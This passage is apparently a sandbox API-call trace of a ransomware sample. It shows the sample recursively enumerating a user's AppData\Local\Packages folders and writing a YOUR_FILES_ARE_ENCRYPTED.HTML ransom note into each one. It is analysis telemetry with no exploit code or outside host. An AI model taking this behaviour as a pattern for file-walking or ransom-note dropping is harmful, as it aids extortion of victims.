PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0118.184] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xdbd82a85, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbd82a85, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbd82a85, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0118.184] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0118.184] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0118.184] GetProcessHeap () returned 0x600000 [0118.184] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.184] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.vclibs.140.00_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.185] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.186] CloseHandle (hObject=0x324) returned 1 [0118.186] GetProcessHeap () returned 0x600000 [0118.186] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.186] GetProcessHeap () returned 0x600000 [0118.186] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0118.186] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc77a0e, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc77a0e, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc77a0e, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0118.186] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.186] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\SystemAppData") returned 100 [0118.186] GetProcessHeap () returned 0x600000 [0118.186] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0118.186] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\SystemAppData" [0118.186] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\SystemAppData\\*" [0118.186] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc77a0e, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc77a0e, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc77a0e, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName=".", cAlternateFileName="")) returned 0x626638 [0118.187] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc77a0e, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc77a0e, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc77a0e, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName="..", cAlternateFileName="")) returned 1 [0118.187] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc77a0e, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc77a0e, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc77a0e, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName="..", cAlternateFileName="")) returned 0 [0118.187] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0118.187] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0118.187] GetProcessHeap () returned 0x600000 [0118.187] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.187] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.vclibs.140.00_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.188] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.189] CloseHandle (hObject=0x324) returned 1 [0118.189] GetProcessHeap () returned 0x600000 [0118.189] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.189] GetProcessHeap () returned 0x600000 [0118.189] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0118.189] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc51817, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc51817, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc51817, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0118.189] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.189] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\TempState") returned 96 [0118.189] GetProcessHeap () returned 0x600000 [0118.189] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0118.189] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\TempState" [0118.189] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\TempState\\*" [0118.190] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc51817, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc51817, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc51817, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName=".", cAlternateFileName="")) returned 0x626978 [0118.190] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc51817, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc51817, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc51817, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName="..", cAlternateFileName="")) returned 1 [0118.190] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc51817, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc51817, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc51817, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName="..", cAlternateFileName="")) returned 0 [0118.190] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0118.190] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0118.190] GetProcessHeap () returned 0x600000 [0118.190] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.190] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.vclibs.140.00_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.191] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.192] CloseHandle (hObject=0x324) returned 1 [0118.192] GetProcessHeap () returned 0x600000 [0118.192] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.192] GetProcessHeap () returned 0x600000 [0118.192] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0118.192] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc51817, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc51817, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc51817, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0118.192] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0118.192] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0118.192] GetProcessHeap () returned 0x600000 [0118.192] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.193] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.vclibs.140.00_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0118.193] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0118.195] CloseHandle (hObject=0x31c) returned 1 [0118.195] GetProcessHeap () returned 0x600000 [0118.195] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.195] GetProcessHeap () returned 0x600000 [0118.195] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x698498 | out: hHeap=0x600000) returned 1 [0118.201] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a1a852, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89c56a54, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89c56a54, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy", cAlternateFileName="MICROS~1.ASS")) returned 1 [0118.201] StrStrIW (lpFirst="Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.202] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy") returned 102 [0118.202] GetProcessHeap () returned 0x600000 [0118.202] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x698498 [0118.203] lstrcpyW (in: lpString1=0x698498, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy" [0118.203] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\*" [0118.203] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a1a852, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89c56a54, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89c56a54, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0118.232] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a1a852, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89c56a54, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89c56a54, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0118.232] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x89a66c47, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a66c47, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a66c47, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0118.232] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.232] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC") returned 105 [0118.232] GetProcessHeap () returned 0x600000 [0118.232] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0118.233] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC" [0118.233] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\*" [0118.233] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x89a66c47, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a66c47, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a66c47, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0118.236] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x89a66c47, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a66c47, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a66c47, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="..", cAlternateFileName="")) returned 1 [0118.237] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x89a66c47, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a66c47, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a66c47, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0118.237] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.237] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetCache") returned 115 [0118.237] GetProcessHeap () returned 0x600000 [0118.237] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.237] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetCache" [0118.237] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetCache\\*" [0118.237] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x89a66c47, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a66c47, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a66c47, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x3187cb8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0118.242] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x89a66c47, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a66c47, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a66c47, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x3187cb8, cFileName="..", cAlternateFileName="")) returned 1 [0118.242] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x89a66c47, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a66c47, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a66c47, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x3187cb8, cFileName="..", cAlternateFileName="")) returned 0 [0118.242] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0118.242] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: 